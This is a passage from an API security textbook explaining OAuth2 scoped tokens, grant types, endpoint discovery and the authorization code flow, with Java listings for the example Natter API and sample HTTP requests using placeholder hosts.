- Token state can be stored on the client by encoding it in JSON and applying HMAC authentication to prevent tampering.
- Sensitive token attributes can be protected with encryption, and efficient authenticated encryption algorithms can remove the need for a separate HMAC step.
- The JWT and JOSE specifications provide a standard format for authenticated and encrypted tokens but have historically been vulnerable to several serious attacks.
- When used carefully, JWT can be an effective part of your API authentication strategy, but you should avoid the more error-prone parts of the standard.
- Revocation of stateless JWTs can be achieved by maintaining an allowlist or blocklist of tokens in the database. An allowlisting strategy is a secure default offering advantages over both pure stateless tokens and unauthenticated database tokens.
Part 3
Authorization

Now that you know how to identify the users of your APIs, you need to decide what they should do. In this part, you'll take a deep dive into authorization techniques for making those crucial access control decisions.

Chapter 7 starts by taking a look at delegated authorization with OAuth2. In this chapter, you'll learn the difference between discretionary and mandatory access control and how to protect APIs with OAuth2 scopes.

Chapter 8 looks at approaches to access control based on the identity of the user accessing an API. The techniques in this chapter provide more flexible alternatives to the access control lists developed in chapter 3. Role-based access control groups permissions into logical roles to simplify access management, while attribute-based access control uses powerful rule-based policy engines to enforce complex policies.

Chapter 9 discusses a completely different approach to access control, in which the identity of the user plays no part in what they can access. Capability-based access control is based on individual keys with fine-grained permissions. In this chapter, you'll see how a capability-based model fits with RESTful API design principles and examine the trade-offs compared to other authorization approaches. You'll also learn about macaroons, an exciting new token format that allows broadly-scoped access tokens to be converted on-the-fly into more restricted capabilities with some unique abilities.
OAuth2 and
OpenID Connect

This chapter covers
- Enabling third-party access to your API with scoped tokens
- Integrating an OAuth2 Authorization Server for delegated authorization
- Validating OAuth2 access tokens with token introspection
- Implementing single sign-on with OAuth and OpenID Connect

In the last few chapters, you've implemented user authentication methods that are suitable for the Natter UI and your own desktop and mobile apps. Increasingly, APIs are being opened to third-party apps and clients from other businesses and organizations. Natter is no different, and your newly appointed CEO has decided that you can boost growth by encouraging an ecosystem of Natter API clients and services. In this chapter, you'll integrate an OAuth2 Authorization Server (AS) to allow your users to delegate access to third-party clients. By using scoped tokens, users can restrict which parts of the API those clients can access. Finally, you'll see how OAuth provides a standard way to centralize token-based authentication within
your organization to achieve single sign-on across different APIs and services. The OpenID Connect standard builds on top of OAuth2 to provide a more complete authentication framework when you need finer control over how a user is authenticated.

In this chapter, you'll learn how to obtain a token from an AS to access an API, and how to validate those tokens in your API, using the Natter API as an example. You won't learn how to write your own AS, because this is beyond the scope of this book. Using OAuth2 to authorize service-to-service calls is covered in chapter 11.

LEARN ABOUT IT  See OAuth2 in Action by Justin Richer and Antonio Sanso (Manning, 2017; https://www.manning.com/books/oauth-2-in-action) if you want to learn how an AS works in detail.

Because all the mechanisms described in this chapter are standards, the patterns will work with any standards-compliant AS with few changes. See appendix A for details of how to install and configure an AS for use in this chapter.
7.1 Scoped tokens
In the bad old days, if you wanted to use a third-party app or service to access your email or bank account, you had little choice but to give them your username and password and hope they didn't misuse them. Unfortunately, some services did misuse those credentials. Even the ones that were trustworthy would have to store your password in a recoverable form to be able to use it, making potential compromise much more likely, as you learned in chapter 3. Token-based authentication provides a solution to this problem by allowing you to generate a long-lived token that you can give to the third-party service instead of your password. The service can then use the token to act on your behalf. When you stop using the service, you can revoke the token to prevent any further access.

Though using a token means that you don't need to give the third-party your password, the tokens you've used so far still grant full access to APIs as if you were performing actions yourself. The third-party service can use the token to do anything that you can do. But you may not trust a third-party to have full access, and only want to grant them partial access. When I ran my own business, I briefly used a third-party service to read transactions from my business bank account and import them into the accounting software I used. Although that service needed only read access to recent transactions, in practice it had full access to my account and could have transferred funds, cancelled payments, and performed many other actions. I stopped using the service and went back to manually entering transactions because the risk was too great.[1]

[1] In some countries, banks are being required to provide secure API access to transactions and payment services to third-party apps and services. The UK's Open Banking initiative and the European Payment Services Directive 2 (PSD2) regulations are examples, both of which mandate the use of OAuth2.

The solution to these issues is to restrict the API operations that can be performed with a token, allowing it to be used only within a well-defined scope. For example, you might let your accounting software read transactions that have occurred within the
last 30 days, but not let it view or create new payments on the account. The scope of the access you've granted to the accounting software is therefore limited to read-only access to recent transactions. Typically, the scope of a token is represented as one or more string labels stored as an attribute of the token. For example, you might use the scope label transactions:read to allow read-access to transactions, and payment:create to allow setting up a new payment from an account. Because there may be more than one scope label associated with a token, they are often referred to as scopes. The scopes (labels) of a token collectively define the scope of access it grants. Figure 7.1 shows some of the scope labels available when creating a personal access token on GitHub.
DEFINITION
A scoped token limits the operations that can be performed with
that token. The set of operations that are allowed is known as the scope of the
token. The scope of a token is specified by one or more scope labels, which
are often referred to collectively as scopes.
Figure 7.1 GitHub allows users to manually create scoped tokens, which they call personal access tokens. The tokens never expire but can be restricted to only allow access to parts of the GitHub API by setting the scope of the token. Scopes control access to different sections of the API, and GitHub supports hierarchical scopes, allowing the user to easily grant related scopes. The user can also add a note to remember why they created the token.
7.1.1 Adding scoped tokens to Natter
Adapting the existing login endpoint to issue scoped tokens is very simple, as shown in listing 7.1. When a login request is received, if it contains a scope parameter then you can associate that scope with the token by storing it in the token attributes. You can define a default set of scopes to grant if the scope parameter is not specified. Open the TokenController.java file in your editor and update the login method to add support for scoped tokens, as in listing 7.1. At the top of the file, add a new constant listing all the scopes. In Natter, you'll use scopes corresponding to each API operation:

private static final String DEFAULT_SCOPES =
    "create_space post_message read_message list_messages " +
    "delete_message add_member";
WARNING  There is a potential privilege escalation issue to be aware of in this code. A client that is given a scoped token can call this endpoint to exchange it for one with more scopes. You'll fix that shortly by adding a new access control rule for the login endpoint to prevent this.
Listing 7.1 Issuing scoped tokens

public JSONObject login(Request request, Response response) {
    String subject = request.attribute("subject");
    var expiry = Instant.now().plus(10, ChronoUnit.MINUTES);

    var token = new TokenStore.Token(expiry, subject);
    // Store the scope in the token attributes, defaulting to
    // all scopes if not specified.
    var scope = request.queryParamOrDefault("scope", DEFAULT_SCOPES);
    token.attributes.put("scope", scope);

    var tokenId = tokenStore.create(request, token);
    response.status(201);
    return new JSONObject()
            .put("token", tokenId);
}
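You can try the new parameter out from Java as well as curl. A sketch using the JDK HttpClient (for example, in jshell); trust configuration for Natter's self-signed localhost certificate is omitted, so this will need that set up to actually run:

import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;
import java.util.Base64;

var credentials = Base64.getEncoder()
        .encodeToString("test:password".getBytes());
var request = HttpRequest.newBuilder()
        .uri(URI.create("https://localhost:4567/sessions?scope=post_message"))
        .header("Authorization", "Basic " + credentials)
        .POST(HttpRequest.BodyPublishers.noBody())
        .build();
var response = HttpClient.newHttpClient()
        .send(request, HttpResponse.BodyHandlers.ofString());
// The returned token is now limited to the post_message scope.
System.out.println(response.body());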
To enforce the scope restrictions on a token, you can add a new access control filter that ensures that the token used to authorize a request to the API has the required scope for the operation being performed. This filter looks a lot like the existing permission filter that you added in chapter 3 and is shown in listing 7.2. (I'll discuss the differences between scopes and permissions in the next section.) To verify the scope, you need to perform several checks:

- First, check if the HTTP method of the request matches the method that this rule is for, so that you don't apply a scope for a POST request to a DELETE request or vice versa. This is needed because Spark's filters are matched only by the path and not the request method.
- You can then look up the scope associated with the token that authorized the current request from the scope attribute of the request. This works because the token validation code you wrote in chapter 4 copies any attributes from the token into the request, so the scope attribute will be copied across too.
- If there is no scope attribute, then the user directly authenticated the request with Basic authentication. In this case, you can skip the scope check and let the request proceed. Any client with access to the user's password would be able to issue themselves a token with any scope.
- Finally, you can verify that the scope of the token matches the required scope for this request, and if it doesn't, then you should return a 403 Forbidden error. The Bearer authentication scheme has a dedicated error code insufficient_scope to indicate that the caller needs a token with a different scope, so you can indicate that in the WWW-Authenticate header.

Open TokenController.java in your editor again and add the requireScope method from the listing.
Listing 7.2 Checking required scopes

public Filter requireScope(String method, String requiredScope) {
    return (request, response) -> {
        // If the HTTP method doesn't match, then ignore this rule.
        if (!method.equalsIgnoreCase(request.requestMethod()))
            return;

        // If the token is unscoped, then allow all operations.
        var tokenScope = request.<String>attribute("scope");
        if (tokenScope == null) return;

        // If the token scope doesn't contain the required scope,
        // then return a 403 Forbidden response.
        if (!Set.of(tokenScope.split(" "))
                .contains(requiredScope)) {
            response.header("WWW-Authenticate",
                    "Bearer error=\"insufficient_scope\"," +
                    "scope=\"" + requiredScope + "\"");
            halt(403);
        }
    };
}
You can now use this method to enforce which scope is required to perform certain operations, as shown in listing 7.3. Deciding what scopes should be used by your API, and exactly which scope should be required for which operations, is a complex topic, discussed in more detail in the next section. For this example, you can use fine-grained scopes corresponding to each API operation: create_space, post_message, and so on. To avoid privilege escalation, you should require a specific scope to call the login endpoint, because this can be used to obtain a token with any scope, effectively bypassing the scope checks.[2] On the other hand, revoking a token by calling the logout endpoint should not require any scope. Open the Main.java file in your editor and add scope checks using the tokenController.requireScope method as shown in listing 7.3.

[2] An alternative way to eliminate this risk is to ensure that any newly issued token contains only scopes that are in the token used to call the login endpoint. I'll leave this as an exercise.
before("/sessions", userController::requireAuthentication);
before("/sessions",
tokenController.requireScope("POST", "full_access"));
post("/sessions", tokenController::login);
delete("/sessions", tokenController::logout);
before("/spaces", userController::requireAuthentication);
before("/spaces",
tokenController.requireScope("POST", "create_space"));
post("/spaces", spaceController::createSpace);
before("/spaces/*/messages",
tokenController.requireScope("POST", "post_message"));
before("/spaces/:spaceId/messages",
userController.requirePermission("POST", "w"));
post("/spaces/:spaceId/messages", spaceController::postMessage);
before("/spaces/*/messages/*",
tokenController.requireScope("GET", "read_message"));
before("/spaces/:spaceId/messages/*",
userController.requirePermission("GET", "r"));
get("/spaces/:spaceId/messages/:msgId",
spaceController::readMessage);
before("/spaces/*/messages",
tokenController.requireScope("GET", "list_messages"));
before("/spaces/:spaceId/messages",
userController.requirePermission("GET", "r"));
get("/spaces/:spaceId/messages", spaceController::findMessages);
before("/spaces/*/members",
tokenController.requireScope("POST", "add_member"));
before("/spaces/:spaceId/members",
userController.requirePermission("POST", "rwd"));
post("/spaces/:spaceId/members", spaceController::addMember);
before("/spaces/*/messages/*",
tokenController.requireScope("DELETE", "delete_message"));
before("/spaces/:spaceId/messages/*",
userController.requirePermission("DELETE", "d"));
delete("/spaces/:spaceId/messages/:msgId",
moderatorController::deletePost);
Listing 7.3
Enforcing scopes for operations
Ensure that obtaining a scoped token
itself requires a restricted scope.
Revoking a token
should not require
any scope.
Add scope
requirements
to each
operation
exposed by
the API.
7.1.2 The difference between scopes and permissions
At first glance, it may seem that scopes and permissions are very similar, but there is a distinction in what they are used for, as shown in figure 7.2. Typically, an API is owned and operated by a central authority such as a company or an organization. Who can access the API and what they are allowed to do is controlled entirely by the central authority. This is an example of mandatory access control, because the users have no control over their own permissions or those of other users. On the other hand, when a user delegates some of their access to a third-party app or service, that is known as discretionary access control, because it's up to the user how much of their access to grant to the third party. OAuth scopes are fundamentally about discretionary access control, while traditional permissions (which you implemented using ACLs in chapter 3) can be used for mandatory access control.

DEFINITION  With mandatory access control (MAC), user permissions are set and enforced by a central authority and cannot be granted by users themselves. With discretionary access control (DAC), users can delegate some of their permissions to other users. OAuth2 allows discretionary access control, also known as delegated authorization.

Whereas scopes are used for delegation, permissions may be used for either mandatory or discretionary access. File permissions in UNIX and most other popular operating systems can be set by the owner of the file to grant access to other users and so implement DAC. In contrast, some operating systems used by the military and governments have mandatory access controls that prevent somebody with only SECRET clearance from reading TOP SECRET documents, for example, regardless of whether
the owner of the file wants to grant them access.[3] Methods for organizing and enforcing permissions for MAC are covered in chapter 8. OAuth scopes provide a way to layer DAC on top of an existing MAC security layer.

[3] Projects such as SELinux (https://selinuxproject.org/page/Main_Page) and AppArmor (https://apparmor.net/) bring mandatory access controls to Linux.

Figure 7.2 Permissions are typically granted to users by a central authority that owns the API being accessed. A user does not get to choose or change their own permissions. Scopes allow a user to delegate part of their authority to a third-party app, restricting how much access they grant using scopes.
Putting the theoretical distinction between MAC and DAC to one side, the more practical distinction between scopes and permissions relates to how they are designed. The administrator of an API designs permissions to reflect the security goals for the system. These permissions reflect organizational policies. For example, an employee doing one job might have read and write access to all documents on a shared drive. Permissions should be designed based on access control decisions that an administrator may want to make for individual users, while scopes should be designed based on anticipating how users may want to delegate their access to third-party apps and services.

NOTE  The delegated authorization in OAuth is about users delegating their authority to clients, such as mobile apps. The User Managed Access (UMA) extension of OAuth2 allows users to delegate access to other users.

An example of this distinction can be seen in the design of OAuth scopes used by Google for access to their Google Cloud Platform services. Services that deal with system administration jobs, such as the Key Management Service for handling cryptographic keys, only have a single scope that grants access to that entire API. Access to individual keys is managed through permissions instead. But APIs that provide access to individual user data, such as the Fitness API (http://mng.bz/EEDJ) are broken down into much more fine-grained scopes, allowing users to choose exactly which health statistics they wish to share with third parties, as shown in figure 7.3. Providing users with fine-grained control when sharing their data is a key part of a modern privacy and consent strategy and may be required in some cases by legislation such as the EU General Data Protection Regulation (GDPR).

Another distinction between scopes and permissions is that scopes typically only identify the set of API operations that can be performed, while permissions also identify the specific objects that can be accessed. For example, a client may be granted a list_files scope that allows it to call an API operation to list files on a shared drive, but the set of files returned may differ depending on the permissions of the user that authorized the token. This distinction is not fundamental, but reflects the fact that scopes are often added to an API as an additional layer on top of an existing permission system and are checked based on basic information in the HTTP request without knowledge of the individual data objects that will be operated on.

When choosing which scopes to expose in your API, you should consider what level of control your users are likely to need when delegating access. There is no simple answer to this question, and scope design typically requires several iterations of collaboration between security architects, user experience designers, and user representatives.

LEARN ABOUT IT  Some general strategies for scope design and documentation are provided in The Design of Web APIs by Arnaud Lauret (Manning, 2019; https://www.manning.com/books/the-design-of-web-apis).
Pop quiz

1. Which of the following are typical differences between scopes and permissions?
   a) Scopes are more fine-grained than permissions.
   b) Scopes are more coarse-grained than permissions.
   c) Scopes use longer names than permissions.
   d) Permissions are often set by a central authority, while scopes are designed for delegating access.
   e) Scopes typically only restrict the API operations that can be called. Permissions also restrict which objects can be accessed.

The answer is at the end of the chapter.
Figure 7.3 Google Cloud Platform OAuth scopes are very coarse-grained for system APIs such as database access or key management, allowing access to the entire API with a single scope. For APIs that process user data, such as the Fitness API, many more fine-grained scopes are defined, allowing users greater control over what they share with third-party apps and services.
7.2 Introducing OAuth2
Although allowing your users to manually create scoped tokens for third-party applications is an improvement over sharing unscoped tokens or user credentials, it can be confusing and error-prone. A user may not know which scopes are required for that application to function and so may create a token with too few scopes, or perhaps delegate all scopes just to get the application to work.

A better solution is for the application to request the scopes that it requires, and then the API can ask the user if they consent. This is the approach taken by the OAuth2 delegated authorization protocol, as shown in figure 7.4. Because an organization may have many APIs, OAuth introduces the notion of an Authorization Server (AS), which acts as a central service for managing user authentication and consent and issuing tokens. As you'll see later in this chapter, this centralization provides significant advantages even if your API has no third-party clients, which is one reason why OAuth2 has become so popular as a standard for API security. The tokens that an application uses to access an API are known as access tokens in OAuth2, to distinguish them from other sorts of tokens that you'll learn about later in this chapter.
DEFINITION
An access token is a token issued by an OAuth2 authorization
server to allow a client to access an API.
Figure 7.4 To access an API using OAuth2, an app must first obtain an access token from the Authorization Server (AS). The app tells the AS what scope of access it requires. The AS verifies that the user consents to this access and issues an access token to the app. The app can then use the access token to access the API on the user's behalf.
OAuth uses specific terms to refer to the four entities shown in figure 7.4, based on the role they play in the interaction:

- The authorization server (AS) authenticates the user and issues tokens to clients.
- The user is known as the resource owner (RO), because it's typically their resources (documents, photos, and so on) that the third-party app is trying to access. This term is not always accurate, but it has stuck now.
- The third-party app or service is known as the client.
- The API that hosts the user's resources is known as the resource server (RS).
7.2.1 Types of clients
Before a client can ask for an access token it must first register with the AS and obtain a unique client ID. This can either be done manually by a system administrator, or there is a standard to allow clients to dynamically register with an AS (https://tools.ietf.org/html/rfc7591).

LEARN ABOUT IT  OAuth2 in Action by Justin Richer and Antonio Sanso (Manning, 2017; https://www.manning.com/books/oauth-2-in-action) covers dynamic client registration in more detail.
There are two different types of clients:

- Public clients are applications that run entirely within a user's own device, such as a mobile app or JavaScript client running in a browser. The client is completely under the user's control.
- Confidential clients run in a protected web server or other secure location that is not under a user's direct control.
The main difference between the two is that a confidential client can have its own client credentials that it uses to authenticate to the authorization server. This ensures that an attacker cannot impersonate a legitimate client to try to obtain an access token from a user in a phishing attack. A mobile or browser-based application cannot keep credentials secret because any user that downloads the application could extract them.[4] For public clients, alternative measures are used to protect against these attacks, as you'll see shortly.

[4] A possible solution to this is to dynamically register each individual instance of the application as a new client when it starts up so that each gets its own unique credentials. See chapter 12 of OAuth2 in Action (Manning, 2017) for details.
DEFINITION
A confidential client uses client credentials to authenticate to the
AS. Usually, this is a long random password known as a client secret, but more
secure forms of authentication can be used, including JWTs and TLS client
certificates.
Each client can typically be configured with the set of scopes that it can ask a user for. This allows an administrator to prevent untrusted apps from even asking for some scopes if they allow privileged access. For example, a bank might allow most clients
read-only access to a user’s recent transactions but require more extensive validation
of the app’s developer before the app can initiate payments.
7.2.2 Authorization grants
To obtain an access token, the client must first obtain consent from the user in the form of an authorization grant with appropriate scopes. The client then presents this grant to the AS's token endpoint to obtain an access token. OAuth2 supports many different authorization grant types to support different kinds of clients:

- The Resource Owner Password Credentials (ROPC) grant is the simplest, in which the user supplies their username and password to the client, which then sends them directly to the AS to obtain an access token with any scope it wants. This is almost identical to the token login endpoint you developed in previous chapters and is not recommended for third-party clients because the user directly shares their password with the app: the very thing you were trying to avoid!

  CAUTION  ROPC can be useful for testing but should be avoided in most cases. It may be deprecated in future versions of the standard.

- In the Authorization Code grant, the client first uses a web browser to navigate to a dedicated authorization endpoint on the AS, indicating which scopes it requires. The AS then authenticates the user directly in the browser and asks for consent for the client access. If the user agrees then the AS generates an authorization code and gives it to the client to exchange for an access token at the token endpoint. The authorization code grant is covered in more detail in the next section.
- The Client Credentials grant allows the client to obtain an access token using its own credentials, with no user involved at all. This grant can be useful in some microservice communications patterns discussed in chapter 11.
- There are several additional grant types for more specific situations, such as the device authorization grant (also known as device flow) for devices without any direct means of user interaction. There is no registry of defined grant types, but websites such as https://oauth.net/2/grant-types/ list the most commonly used types. The device authorization grant is covered in chapter 13. OAuth2 grants are extensible, so new grant types can be added when one of the existing grants doesn't fit.
What about the implicit grant?

The original definition of OAuth2 included a variation on the authorization code grant known as the implicit grant. In this grant, the AS returned an access token directly from the authorization endpoint, so that the client didn't need to call the token endpoint to exchange a code. This was allowed because when OAuth2 was standardized in 2012, CORS had not yet been finalized, so a browser-based client such as a single-page app could not make a cross-origin call to the token endpoint. In the implicit grant, the AS redirects back from the authorization endpoint to a URI controlled by the client, with the access token included in the fragment component of the URI. This introduces some security weaknesses compared to the authorization code grant, as the access token may be stolen by other scripts running in the browser or leak through the browser history and other mechanisms. Since CORS is now widely supported by browsers, there is no need to use the implicit grant any longer and the OAuth Security Best Common Practice document (https://tools.ietf.org/html/draft-ietf-oauth-security-topics) now advises against its use.
An example of obtaining an access token using the ROPC grant type is as follows, as this is the simplest grant type. The client specifies the grant type (password in this case), its client ID (for a public client), and the scope it's requesting as POST parameters in the application/x-www-form-urlencoded format used by HTML forms. It also sends the resource owner's username and password in the same way. The AS will authenticate the RO using the supplied credentials and, if successful, will return an access token in a JSON response. The response also contains metadata about the token, such as how long it's valid for (in seconds).

$ curl -d 'grant_type=password&client_id=test
➥ &scope=read_messages+post_message
➥ &username=demo&password=changeit'
➥ https://as.example.com:8443/oauth2/access_token
{
    "access_token":"I4d9xuSQABWthy71it8UaRNM2JA",
    "scope":"post_message read_messages",
    "token_type":"Bearer",
    "expires_in":3599
}
7.2.3 Discovering OAuth2 endpoints
The OAuth2 standards don’t define specific paths for the token and authorization
endpoints, so these can vary from AS to AS. As extensions have been added to OAuth,
several other endpoints have been added, along with several settings for new features.
To avoid each client having to hard-code the locations of these endpoints, there is a
standard way to discover these settings using a service discovery document published
under a well-known location. Originally developed for the OpenID Connect profile of
OAuth (which is covered later in this chapter), it has been adopted by OAuth2
(https://tools.ietf.org/html/rfc8414).
A conforming AS is required to publish a JSON document under the path /.well-
known/oauth-authorization-server under the root of its web server.5 This JSON docu-
ment contains the locations of the token and authorization endpoints and other set-
tings. For example, if your AS is hosted as https:/ /as.example.com:8443, then a GET
request to https://as.example.com:8443/.well-known/oauth-authorization-server returns a JSON document like the following:

{
    "authorization_endpoint":
        "http://openam.example.com:8080/oauth2/authorize",
    "token_endpoint":
        "http://openam.example.com:8080/oauth2/access_token",
    …
}

[5] AS software that supports the OpenID Connect standard may use the path /.well-known/openid-configuration instead. It is recommended to check both locations.
WARNING
Because the client will send credentials and access tokens to many of
these endpoints, it’s critical that they are discovered from a trustworthy source.
Only retrieve the discovery document over HTTPS from a trusted URL.
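In code, discovery is a single GET plus JSON parsing. A sketch using the JDK HttpClient and the org.json library already used by the Natter code; per the warning above, only ever use a trusted HTTPS URL here:

import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;
import org.json.JSONObject;

var discoveryUri = URI.create(
        "https://as.example.com:8443/.well-known/oauth-authorization-server");
var response = HttpClient.newHttpClient().send(
        HttpRequest.newBuilder(discoveryUri).GET().build(),
        HttpResponse.BodyHandlers.ofString());
var discovery = new JSONObject(response.body());
// Read the endpoint locations rather than hard-coding them in the client.
var authorizationEndpoint = discovery.getString("authorization_endpoint");
var tokenEndpoint = discovery.getString("token_endpoint");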
7.3 The Authorization Code grant
Though OAuth2 supports many different authorization grant types, by far the most useful and secure choice for most clients is the authorization code grant. With the implicit grant now discouraged, the authorization code grant is the preferred way for almost all client types to obtain an access token, including the following:

- Server-side clients, such as traditional web applications or other APIs. A server-side application should be a confidential client with credentials to authenticate to the AS.
- Client-side JavaScript applications that run in the browser, such as single-page apps. A client-side application is always a public client because it has no secure place to store a client secret.
- Mobile, desktop, and command-line applications. As for client-side applications, these should be public clients, because any secret embedded into the application can be extracted by a user.
Pop quiz

2. Which two of the standard OAuth grants are now discouraged?
   a) The implicit grant
   b) The authorization code grant
   c) The device authorization grant
   d) Hugh Grant
   e) The Resource Owner Password Credentials (ROPC) grant

3. Which type of client should be used for a mobile app?
   a) A public client
   b) A confidential client

The answers are at the end of the chapter.
In the authorization code grant, the client first redirects the user's web browser to the authorization endpoint at the AS, as shown in figure 7.5. The client includes its client ID and the scope it's requesting from the AS in this redirect. Set the response_type parameter in the query to code to request an authorization code (other settings such as token are used for the implicit grant).

Figure 7.5 In the Authorization Code grant, the client first redirects the user's web browser to the authorization endpoint for the AS, including its client ID and requested scope in the request. The AS then authenticates the user (RO) and asks for consent to grant access to the application. If approved, then the AS redirects the web browser to a URI controlled by the client, including an authorization code. The client can then call the AS token endpoint to exchange the authorization code for an access token to use to access the API on the user's behalf.

Finally, the client should generate a unique
random state value for each request and store it locally (such as in a browser cookie). When the AS redirects back to the client with the authorization code it will include the same state parameter, and the client should check that it matches the original one sent on the request. This ensures that the code received by the client is the one it requested. Otherwise, an attacker may be able to craft a link that calls the client's redirect endpoint directly with an authorization code obtained by the attacker. This attack is like the Login CSRF attacks discussed in chapter 4, and the state parameter plays a similar role to an anti-CSRF token in that case. Finally, the client should include the URI that it wants the AS to redirect to with the authorization code. Typically, the AS will require the client's redirect URI to be pre-registered to prevent open redirect attacks.

DEFINITION  An open redirect vulnerability is when a server can be tricked into redirecting a web browser to a URI under the attacker's control. This can be used for phishing because it initially looks like the user is going to a trusted site, only to be redirected to the attacker. You should require all redirect URIs to be pre-registered by trusted clients rather than redirecting to any URI provided in a request.
For a web application, this is simply a case of returning an HTTP redirect status code
such as 303 See Other,6 with the URI for the authorization endpoint in the Location
header, as in the following example:
HTTP/1.1 303 See Other
Location: https://as.example.com/authorize?client_id=test
➥ &scope=read_messages+post_message
➥ &state=t9kWoBWsYjbsNwY0ACJj0A
➥ &response_type=code
➥ &redirect_uri=https://client.example.net/callback
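
Putting the preceding steps together, a sketch of generating the state value and building the redirect URI might look like the following (the class is hypothetical; the endpoint, client ID, and scope values are the same placeholders as in the example above):

import java.security.SecureRandom;
import java.util.Base64;

class AuthorizeRedirect {
    static String buildRedirectUri() {
        // Generate an unguessable state value to check on the callback.
        var random = new SecureRandom();
        var stateBytes = new byte[16];
        random.nextBytes(stateBytes);
        var state = Base64.getUrlEncoder().withoutPadding()
                .encodeToString(stateBytes);
        // Store the state locally (e.g., in a cookie) before redirecting.
        return "https://as.example.com/authorize" +
                "?client_id=test" +
                "&scope=read_messages+post_message" +
                "&state=" + state +
                "&response_type=code" +
                "&redirect_uri=https://client.example.net/callback";
    }
}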
For mobile and desktop applications, the client should launch the system web browser
to carry out the authorization. The latest best practice advice for native applications
(https://tools.ietf.org/html/rfc8252) recommends that the system browser be used
for this, rather than embedding an HTML view within the application. This avoids
users having to type their credentials into a UI under the control of a third-party app
and allows users to reuse any cookies or other session tokens they may already have in
the system browser for the AS to avoid having to log in again. Both Android and iOS
support using the system browser without leaving the current application, providing a
similar user experience to using an embedded web view.
Once the user has authenticated in their browser, the AS will typically display a
page telling the user which client is requesting access and the scope it requires, such
as that shown in figure 7.6. The user is then given an opportunity to accept or decline
the request, or possibly to adjust the scope of access that they are willing to grant. If
the user approves, then the AS will issue an HTTP redirect to a URI controlled by the
client application with the authorization code and the original state value as a query
parameter:
HTTP/1.1 303 See Other
Location: https://client.example.net/callback?
➥ code=kdYfMS7H3sOO5y_sKhpdV6NFfik
➥ &state=t9kWoBWsYjbsNwY0ACJj0A

Figure 7.6 An example OAuth2 consent page indicating the name of the client requesting access and the scope it requires. The user can choose to allow or deny the request.
Because the authorization code is included in the query parameters of the redirect,
it’s vulnerable to being stolen by malicious scripts running in the browser or leaking
in server access logs, browser history, or through the HTTP Referer header. To pro-
tect against this, the authorization code is usually only valid for a short period of time
and the AS will enforce that it’s used only once. If an attacker tries to use a stolen code
after the legitimate client has used it, then the AS will reject the request and revoke
any access tokens already issued with that code.
The client can then exchange the authorization code for an access token by calling
the token endpoint on the AS. It sends the authorization code in the body of a POST
request, using the application/x-www-form-urlencoded encoding used for HTML
forms, with the following parameters:
- Indicate the authorization code grant type is being used by including grant_type=authorization_code.
- Include the client ID in the client_id parameter or supply client credentials to identify the client.
- Include the redirect URI that was used in the original request in the redirect_uri parameter.
- Finally, include the authorization code as the value of the code parameter.
This is a direct HTTPS call from the client to the AS rather than a redirect in the web
browser, and so the access token returned to the client is protected against theft or
tampering. An example request to the token endpoint looks like the following:
POST /token HTTP/1.1
Host: as.example.com
Content-Type: application/x-www-form-urlencoded
Authorization: Basic dGVzdDpwYXNzd29yZA==
grant_type=authorization_code&
code=kdYfMS7H3sOO5y_sKhpdV6NFfik&
redirect_uri=https://client.example.net/callback
If the authorization code is valid and has not expired, then the AS will respond with the access token in a JSON response, along with some (optional) details about the scope (which may differ from the scope requested) and expiry time of the token:
HTTP/1.1 200 OK
Content-Type: application/json
{
  "access_token":"QdT8POxT2SReqKNtcRDicEgIgkk",
  "scope":"post_message read_messages",
  "token_type":"Bearer",
  "expires_in":3599
}
If the client is confidential, then it must authenticate to the token endpoint when it
exchanges the authorization code. In the most common case, this is done by includ-
ing the client ID and client secret as a username and password using HTTP Basic
authentication, but alternative authentication methods are allowed, such as using a
JWT or TLS client certificate. Authenticating to the token endpoint prevents a mali-
cious client from using a stolen authorization code to obtain an access token.
Once the client has obtained an access token, it can use it to access the APIs on the
resource server by including it in an Authorization: Bearer header just as you’ve
done in previous chapters. You’ll see how to validate an access token in your API in
section 7.4.
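
As an illustration, the same exchange can be performed from Java using the java.net.http client that this chapter uses elsewhere. The following is a sketch, not production code; the endpoint and the test:password credentials are the placeholder values from the examples above:

import java.net.URI;
import java.net.URLEncoder;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;
import java.util.Base64;

import static java.nio.charset.StandardCharsets.UTF_8;

public class TokenExchange {
    public static void main(String... args) throws Exception {
        // The authorization code received on the redirect URI.
        var code = args[0];
        var form = "grant_type=authorization_code" +
                "&code=" + URLEncoder.encode(code, UTF_8) +
                "&redirect_uri=" + URLEncoder.encode(
                        "https://client.example.net/callback", UTF_8);
        // HTTP Basic authentication for a confidential client.
        var credentials = Base64.getEncoder()
                .encodeToString("test:password".getBytes(UTF_8));
        var request = HttpRequest.newBuilder()
                .uri(URI.create("https://as.example.com/token"))
                .header("Content-Type", "application/x-www-form-urlencoded")
                .header("Authorization", "Basic " + credentials)
                .POST(HttpRequest.BodyPublishers.ofString(form))
                .build();
        var response = HttpClient.newHttpClient()
                .send(request, HttpResponse.BodyHandlers.ofString());
        // The response body is the JSON containing the access_token.
        System.out.println(response.body());
    }
}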
7.3.1 Redirect URIs for different types of clients
The choice of redirect URI is an important security consideration for a client. For
public clients that don’t authenticate to the AS, the redirect URI is the only measure
by which the AS can be assured that the authorization code is sent to the right client.
If the redirect URI is vulnerable to interception, then an attacker may steal authoriza-
tion codes.
For a traditional web application, it’s simple to create a dedicated endpoint to use
for the redirect URI to receive the authorization code. For a single-page app, the redi-
rect URI should be the URI of the app from which client-side JavaScript can then
extract the authorization code and make a CORS request to the token endpoint.
For mobile applications, there are two primary options:

- The application can register a private-use URI scheme with the mobile operating system, such as myapp://callback. When the AS redirects to myapp://callback?code=… in the system web browser, the operating system will launch the native app and pass it the callback URI. The native application can then extract the authorization code from this URI and call the token endpoint.
- An alternative is to register a portion of the path on the web domain of the app producer. For example, your app could register with the operating system that it will handle all requests to https://example.com/app/callback. When the AS redirects to this HTTPS endpoint, the mobile operating system will launch the native app just as for a private-use URI scheme. Android calls this an App Link (https://developer.android.com/training/app-links/), while on iOS they are known as Universal Links (https://developer.apple.com/ios/universal-links/).
A drawback with private-use URI schemes is that any app can register to handle any
URI scheme, so a malicious application could register the same scheme as your legiti-
mate client. If a user has the malicious application installed, then the redirect from
the AS with an authorization code may cause the malicious application to be activated
rather than your legitimate application. Registered HTTPS redirect URIs on Android
(App Links) and iOS (Universal Links) avoid this problem because an app can only
claim part of the address space of a website if the website in question publishes a JSON
